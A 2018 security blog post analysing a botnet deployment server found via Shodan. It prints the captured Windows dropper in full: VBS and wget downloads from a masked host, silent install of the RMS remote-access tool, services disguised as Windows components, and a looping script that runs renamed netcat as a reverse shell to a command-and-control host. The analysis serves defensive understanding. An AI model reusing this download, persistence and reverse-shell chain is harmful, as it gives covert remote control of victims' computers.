Investigating malicious code

By Roger, Wed 02 May 2018, in category Security

botnet, security

Investigating malicious code

During some search on shodan, I stumbled on a couple of servers containing a very strange site. I looked for port:8081 index32 and found this. The code looks like a server from where a botnet network will be installed, kind of deployment server.

:::xml
HTTP/1.1 200 Ok
Content-Length: 3673
Last-modified: Sat, 14 Oct 2017 14:15:34 GMT
Content-Type: text/html
Connection: Keep-Alive
Server: SHS

<a href="index32.html">x32</a>
<br />
<a href="index64.html">x64</a>
<br /><br />

md "C:\WINDOWS\SysWOW64\wbem\" &
del C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
del C:\WINDOWS\SysWOW64\wbem\wget.exe &
del C:\WINDOWS\SysWOW64\wbem\7za.exe &
ping -n 2 127.0.0.1 &
echo Set x = CreateObject("WinHttp.WinHttpRequest.5.1") >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
echo call x.Open("GET", "http://XX.XX.XX.XX:8081/32/wget.exe", 0) >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
echo x.Send() >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
echo Set s = CreateObject("ADODB.Stream") >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
echo s.Mode = 3 >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
echo s.Type = 1 >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
echo s.Open() >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
echo s.Write(x.responseBody) >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
echo call s.SaveToFile("C:\WINDOWS\SysWOW64\wbem\wget.exe", 2) >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
cscript C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
ping -n 2 127.0.0.1 &
del C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
ping -n 2 127.0.0.1 &
C:\WINDOWS\SysWOW64\wbem\wget -c -t 5 -P C:\WINDOWS\SysWOW64\Wbem --no-check-certificate http://XX.XX.XX.XX:8081/32/7za.exe &
ping -n 2 127.0.0.1 &
ren C:\WINDOWS\SysWOW64\Wbem\mzbl 7za.exe &
ping -n 1 127.0.0.1 &
copy /y c:\WINDOWS\SysWOW64\wbem\wget.exe c:\windows\system32\wbem\ &
copy /y c:\WINDOWS\SysWOW64\Wbem\7za.exe c:\windows\system32\wbem\ &
C:\WINDOWS\SysWOW64\wbem\7za &
echo. &
echo. &
set PROCESSOR_ARCH &
echo.

<br /><br /><br /><br />

C:\WINDOWS\SysWOW64\Wbem\wget -c -t 5 -P C:\WINDOWS\SysWOW64\wbem --no-check-certificate http://XX.XX.XX.XX:8081/32/Rms.zip &
ping -n 2 127.0.0.1 &
C:\WINDOWS\SysWOW64\Wbem\7za x -r -p1 "C:\WINDOWS\SysWOW64\wbem\Rms.zip" -o"C:\WINDOWS\SysWOW64\wbem" -aoa &
ping -n 2 127.0.0.1 &
ren C:\WINDOWS\SysWOW64\wbem\Rms Rm &
ping -n 2 127.0.0.1 &
regedit.exe /s c:\Windows\SysWOW64\wbem\Rm\01.reg &
C:\WINDOWS\SysWOW64\wbem\Rm\rutserv.exe /silentinstall &
ping -n 2 127.0.0.1 &
REG ADD HKLM\SYSTEM\CurrentControlSet\services\RManService /v DisplayName /d "Windows Access" /f &
C:\WINDOWS\SysWOW64\wbem\Rm\rutserv.exe /firewall &
del C:\WINDOWS\SysWOW64\wbem\Rms.zip &
C:\WINDOWS\SysWOW64\wbem\Rm\rutserv.exe /start &
ping -n 4 127.0.0.1 &
net start RManService

<br /><br />

sc config "RManService" start= demand

<br /><br /><br /><br />

C:\WINDOWS\SysWOW64\Wbem\wget -c -t 5 -P C:\WINDOWS\SysWOW64\Wbem --no-check-certificate http://XX.XX.XX.XX:8081/32/Ncd1.zip &
ping -n 3 127.0.0.1 &
C:\WINDOWS\SysWOW64\Wbem\7za x -r -p1 "C:\WINDOWS\SysWOW64\Wbem\Ncd1.zip" -o"C:\WINDOWS\SysWOW64\wbem\" -aoa &
xcopy C:\WINDOWS\system32\cmd.exe c:\WINDOWS\SysWOW64\wbem\Ncd1\02\ &
ping -n 3 127.0.0.1 &
ren C:\WINDOWS\SysWOW64\wbem\Ncd1\02\cmd.exe svchost.exe &
ping -n 3 127.0.0.1 &
del c:\Windows\SysWOW64\wbem\Ncd1.zip &
c:\Windows\SysWOW64\wbem\Ncd1\01\instsrv.exe "Windows Ncd" c:\Windows\SysWOW64\wbem\Ncd1\01\svchost.exe &
reg add "HKLM\SYSTEM\CurrentControlSet\Services\Windows Ncd\Parameters" /v Application /d "cscript c:\Windows\SysWOW64\wbem\Ncd1\01.vbs" /f &
reg add "HKLM\SYSTEM\CurrentControlSet\Services\Windows Ncd" /v Description /d "Query service DHCP addresses, and provides performance library information from Windows Management Instrumentation providers to clients on the network. This service only runs when Performance Data Helper is activated." /f &
net start "Windows Ncd"

First have a look at the servers. It looks like the owner of the systems don't know anything about this service they deliver. We could teach them a lesson in cybersecurity because a lot of unnecessary services are still open to the wild. The webservice are always running on "Small Home Server httpd" on port 8081 and the servers are located in Russia (4), Ukraine (2), The Netherlands (1) and Belarus (1).

Next, what exactly are they doing? It looks like a one-liner to install the malware software. These are the steps we identified: Preparing the system:

The remote control application:

The same for Ncd1.zip, the backdoor application:

Nice notice the way they implement a sleep. ping -n 3 127.0.0.1. Doing a ping to localhost.

What is rutserv.exe?

Rms is a remote tool from remote utilities. It is like teamviewer, but with more options and functions. Although it is a legitimate program, it could be used for malicious activities.

Register

Looking in the 01.reg file, we can see some remarkable things. To officiate the data inserted into the register, they wrote it as HEX code. The first part is to change some settings and inserting a licence key. Yes, even malware use licence keys.

:::console
TPF0TROMServerOptions  UseNTAuth
SecurityLevelPortEnableOverlayCaptureShowTrayIconBindIP Any
interfaceLanguageRussianCallbackAutoConnect CallbackConnectInterval
<HideStopIpFilterTypeProtectCallbackSettingsProtectInetIdSettingsDoNotCaptureRDPUseIPv6
InternetIdX-XXXXXXXX-XXXX-XXXXUseInetConnection  UseCustomInetServer
InetIdPort
UseInetIdIPv6DisableRemoteControlDisableRemoteScreenDisableFileTransferDisableRedirect
DisableTelnetDisableRemoteExecuteDisableTaskManagerDisableOverlayDisableShutdownDisableRemoteUpgradeDisablePreviewCaptureDisableDeviceManagerDisableChatDisableScreenRecordDisableAVCaptureDisableSendMessageDisableRegistry
DisableAVChatDisableRemoteSettingsNotifyChangeTrayIconNotifyBallonHintNotifyPlaySoundLogUseSidId42141.5638087153Licenses®RMS-F-<HASH>
ProxySettings&<?xml version="1.0" encoding="UTF-16"?>
<proxy_settings version="51200">
  <use_proxy>false</use_proxy>
  <proxy_type>0</proxy_type>
  <host></host>
  <port>8080</port>
  <need_auth>false</need_auth>
  <ntml_auth>false</ntml_auth>
  <username></username><password>
  </password><domain></domain>
</proxy_settings>

The second part are some settings about the screen recording. They turned it off.

:::xml
<sreen_record_option version="51200">
  <main_options>
    <active>false</active>
    <interval_shot>60</interval_shot>
    <protect_record>false</protect_record>
    <compression_quality>90</compression_quality>
    <scale_quality>100</scale_quality>
    <compression_type>0</compression_type>
    <max_file_size>100</max_file_size>
    <auto_clear>false</auto_clear>
    <auto_clear_days>0</auto_clear_days>
    <used_file_limit>true</used_file_limit>
    <all_files_limit_mb>1000</all_files_limit_mb>
    <draw_datatime_on_image>true</draw_datatime_on_image>
  </main_options>
  <schedules/>
</sreen_record_option>

They they put a password in the register. Completely unreadable.

:::console
"Pwd"=hex:25,d5,5a,d2,83,aa,40,0a,f4,64,c7,6d,71,3c,07,ad

The last part set some settings on how and where to connect. Notice the internal IP also.

:::console
ÿþ[{CCFE6CBD-9608-4107-A67E-9237320510CC}]
internal_connection_id={3F5822DE-5ACD-41CA-8FC2-413E823AD2E8}
host=XXX.XXX.XXX
port=5651
text_message=
auto_connect=1
status=2
display_name=XXX.XXX.XXX
disallow_tray_connect=0
append_computer_name=0

[{CE4311AA-A579-4558-8BB7-0AB69FF213FB}]
internal_connection_id={B26A491B-C580-45BB-92CB-FC33BEFC1EAA}
host=XXX.XXX.XXX
port=5652
text_message=
auto_connect=1
status=2
display_name=XXX.XXX.XXX
disallow_tray_connect=0
append_computer_name=0

[{2690D108-4D7A-40A3-AE1F-F9787371D16C}]
internal_connection_id={621838EB-E801-41B9-9021-74E7AFCF18D0}
host=10.XX.XX.1
port=5651
text_message=
auto_connect=1
status=2
display_name=10.XX.XX.1
disallow_tray_connect=0
append_computer_name=0

[{06B28623-C9D6-4029-8A88-1E5F0C03DFAF}]
internal_connection_id=--
host=10.XX.XX.1
port=5652
text_message=
auto_connect=1
status=2
display_name=10.XX.XX.1
disallow_tray_connect=0
append_computer_name=0

First 01.vbs script

During the start of the service "Windows Ncd", a VB script is started. This is what it does:

:::vbscript
Dim oShell
Set oShell = WScript.CreateObject ("WSCript.shell")
oShell.run "c:\Windows\System32\wbem\Ncd1\7za.exe x -r -p1 ""c:\Windows\System32\wbem\Ncd1\Ncd.zip"" -o""C:\WINDOWS\system32\wbem\"" -aoa", 0
WScript.Sleep 5000
oShell.run "c:\Windows\System32\wbem\Ncd1\svchost.exe c:\Windows\System32\wbem\Ncd\01.vbs", 0
Set oShell = Nothing

It unzips a different zipfile with the name Ncd.zip and runs the new 01.vbs file. Changing or deleting some files won't help. At the start of the service it always unzips the archive.

Second 01.vbs script

So we now have a second 01.vbs. How confusing can it be... This script contains:

:::vbscript
do
Dim oShell
Set oShell = WScript.CreateObject ("WSCript.shell")
oShell.run "c:\Windows\System32\wbem\Ncd\svchost.exe -d -vv XXX.XXX.XXX 8082 -e cmd.exe", 0
WScript.Sleep 30000
oShell.run "net stop ""Windows Ncd""", 0
Set oShell = Nothing
WScript.Sleep 10000
loop

This script uses the just extracted svchost.exe, with is actually just netcat renamed. It starts a connection to the host XXX.XXX.XXX on port 8082 and run a reversed shell on it. So beside all the fancy stuff, it's just a reverse shell they try to start here.

C&C host

Till now we identified one Command and Control host. It uses port 8082 for reverse shells and port 5651 and 5652 for remote control. Looking at shodan.io, we got some more ports. One is the 8089 port, which shodan.io identified as an unpached DLink router. At 2018-04-30 14:17:25, nothing is responding anymore, so it's probably taken offline.

Conclusion

This malware makes a computer remote controlled by the Rms software. It starts a reverse shell and makes it permanent. The way it does this job shows a very simple way that could prove very effective. It also showed how simple some malware could be found. So please keep your computers patched and check on strange services running or connections to unknown remote ports. Also check your external IPs on public services. Maybe those services are not yours at all...